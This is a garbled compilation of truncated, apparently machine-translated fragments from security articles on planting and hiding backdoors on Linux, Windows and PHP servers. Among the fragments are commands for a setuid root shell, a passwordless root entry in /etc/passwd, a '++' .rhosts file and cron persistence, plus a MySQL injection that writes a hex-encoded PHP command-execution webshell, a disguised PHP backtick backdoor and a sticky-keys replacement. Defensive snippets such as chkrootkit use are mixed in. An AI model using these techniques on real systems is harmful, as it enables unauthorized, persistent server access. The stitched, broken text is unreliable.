Hello everyone, I wonder if you have used WebAdmin 2.x? Well, that's the backdoor in the ASP.NET environment. That's my immature work. If there's anything that doesn't work well, please bear with me. Oh, today, let's try again and tell you something about WebAdmin.
1. setuid
# cp /bin/sh /tmp/.sh
# chmod u+s /tmp/.sh
Adding suid to a shell is simple but easy to find.
2. echo "hack: 0: 0: // bin/csh">/etc/passwd
That is, add an account with the id 0 (root) to the system without a password. But the administrator will soon find out!
3. echo "++" >/.rhosts
If the system runs ports 512 and 513, you can add a file named hack to the .rhosts file and log on with rlogin without a password!
4. Add a "wiz" command by modifying the sendmail.cf file; then telnet www.xxx.com 25 and then wiz
Beep. sys/Trojan. ntrootkit.1192, msplugplay 1005.sys/ backdoor. pigeon.13201, etc. 2
Original endurer2008-06-25 1st
(Continued 1) Modify the computer date, then download Dr.Web CureIt! and scan. At the same time, download bat_do and fileinfo to extract file information, package and back up the files, and delete them in a delayed manner. Then download the Rising Kaka Security Assistant to clean up the malicious programs' startup items.
Appendix 1: malicious file in
PHP-based applications face a variety of attacks:
XSS: Cross-site scripting is a vulnerable point for PHP Web applications. Attackers can use it to steal user information. You can configure Apache, or write more secure PHP code (verify all user input) to protect against XSS attacks
SQL injection: This is the vulnerable point of the database layer in PHP applications. The precautions are the same as above. A common approach is to use mysql_real_escape_string() to escape a parameter and then mak
How to generate a backdoor Trojan using Mysql statements: SELECT * FROM 'vbb _ strikes 'WHERE1unionselect2, 3, metadata: inetpubwwwrootcmd. php Mysql injection or MySQL statement in phpmyadmin
How to generate a backdoor Trojan using Mysql statements:
SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes i
After a successful test, you usually want to keep the privilege longer. Leaving a back door is a very important job; backdoors are usually laid out across, but not limited to, database permissions, Web permissions, system user permissions, and so on. This article gives a popular introduction to some ideas for hiding common back doors.
handles invoke the SetServiceStatus function with the SERVICE_ACCEPT_SHUTDOWN control code to receive the SERVICE_CONTROL_SHUTDOWN control code.
3. Service Configuration Program
The service configuration program can change or query the current configuration information for the service. Before invoking the service configuration functions, you must obtain a handle to the service object, which we can of course do by invoking the OpenSCManager, OpenService or CreateService function.
Create, Delete Ser
For more information about how to create a Linux backdoor, see the following. Each file has an owner, indicating who created the file. The file also has a group number, indicating the group to which the file belongs, generally the group to which the file owner belongs.
If it is an executable file, the file generally only has the permission of the user who calls the file during exe
Use the linux backdoor loader program written in perl-general Linux technology-Linux programming and kernel information. The following is a detailed description. Print "++ linux Backdoor tool ++ \ n ";
Print "usage instructions, there are three modes: rushroot, fakebackdoor, and rushport. rushroot adds an account to passwd, and the user name is root, the password is null. n fakebackdoor is bound to a shell
This article mainly introduces simple and concealed backdoor Trojan code. If you are interested in the PHP tutorial, refer to it. This article will introduce a very short and concealed backdoor Trojan, so that you can avoid Trojans when checking programs.
The file content is as follows:
Many comment markers are inserted in the code, which is difficult to detect if the server detection program is not
will get the root user permission easily. This method is almost the most popular. However, many systems clear data in the /tmp directory every few hours or at every startup. Other systems do not allow suid programs in the /tmp directory. Of course, you can modify or clear these limits by yourself (because you are already the root user and have the permission to modify the /var/spool/cron/crontabs/root and /etc/fstab files). The following is the C source program for placing the suid shell program in the/t
PHP security-webshell and webshell detection, phpwebshell Backdoor
PHP-based applications face various attacks:
XSS: For PHP Web applications, cross-site scripting is a vulnerable point. Attackers can exploit this vulnerability to steal user information. You can configure Apache or write safer PHP code (verify all user input) to prevent XSS attacks.
SQL Injection: This is a vulnerable attack point at the database layer in PHP applications. The defe
Anyone who has suffered from Trojans and backdoors (hereinafter referred to as backdoors) will not forget the wreckage left on the machine after the carnage, so people began active defensive work, from patches to firewalls, even wanting to add a validator. Under the fire of these various defensive techniques, a large number of backdoors fell, and novices no longer had to panic online ... But will the back d
* * * rm-f/DEV/TTYSDW'>>/etc/door.cron;service Crond Restart;crontab/etc/door.cron;
The second line appends the "cat/etc/passwd * * * * * * * * * * * >/dev/ttypwd" information to the /etc/door.cron file. /etc/door.cron is a user-defined crontab list file, and crontab executes according to the content of that file.
Write format: * * * * * command
The preceding 5 stars represent minutes (0~59), hours (0~23), date (1~31), month (1~12) and day of the week (0~6), followed by the command to be executed.
So
of the T.txt OK, then add the Lanker mini PHP backdoor client Trojan address to the http://localhost/test/test.php?test=. /t.txt Password added to cmd on it, the results of the implementation of the return can be seen.
For HTML files, this is typically a template file. In order for the Trojan to be inserted into the HTML file to be invoked and not displayed, we can add a text box with a hidden attribute in HTML, such as: Then use the method above. Th
I occasionally came across a piece of code that looks harmless but is in fact a fatal backdoor. It uses the backtick `, which PHP developers generally do not pay attention to: a string enclosed in backticks is equivalent to a call to the shell_exec function.
The camouflage is very good and easily overlooked by the administrator.
// Backticks execute their contents as a shell command, like shell_exec()
$selfNums = $_GET['R'];
if (isset($selfNums)) {
    echo `$selfNums`;
}
Just seeing this code, I think everyone will say there is no problem,
trojan in the picture or HTML file, you can say that the concealment is even higher. Insert the following sentence in the Phpwind forum: "? @include includ/$PHPWIND _root; > General admin is unable to see out.
With the include function to help us, we can hide the PHP trojan in many types of files, such as TXT, HTML, and picture files. Because these three types of files are the most common in forums and article systems, we will test each of them in turn below.
Fi
On the surface, a rootkit is a self-concealing backdoor program, and intruders often use it as an intrusion tool. With a rootkit, intruders can secretly control the compromised computer, which is a huge hazard. Chkrootkit is a tool that searches a Linux system for backdoors in order to detect rootkits. This article will introduce how to install and use Chkrootkit.
Chkrootkit is not included in the official CentOS or Debian repositories,
Virus name: Backdoor.Win32.IRCBot.acd (Kaspersky)
Virus size: 118,272 bytes
Packing method: PE_Patch NTKrnl
Sample MD5: 71b015411d27794c3e900707ef21e6e7
Sample SHA1: 934b80b2bfbb744933ad9de35bc2b588c852d08e
Time detected: 2007.7
Time updated: 2007.7
Transmission Mode: Spread through MSN
Technical Analysis
The virus sends a message to MSN contacts containing an infected compressed package of photos. When the contact on the other side receives and opens
Manually create a Server Self-extract shift Backdoor
Most of the time we get a server, we will leave a backdoor program to facilitate the next entry.
The mainstream choice on servers is the shift backdoor, which replaces the server's built-in Sticky Keys program with our backdoor file.
Call method: Call the function by pressing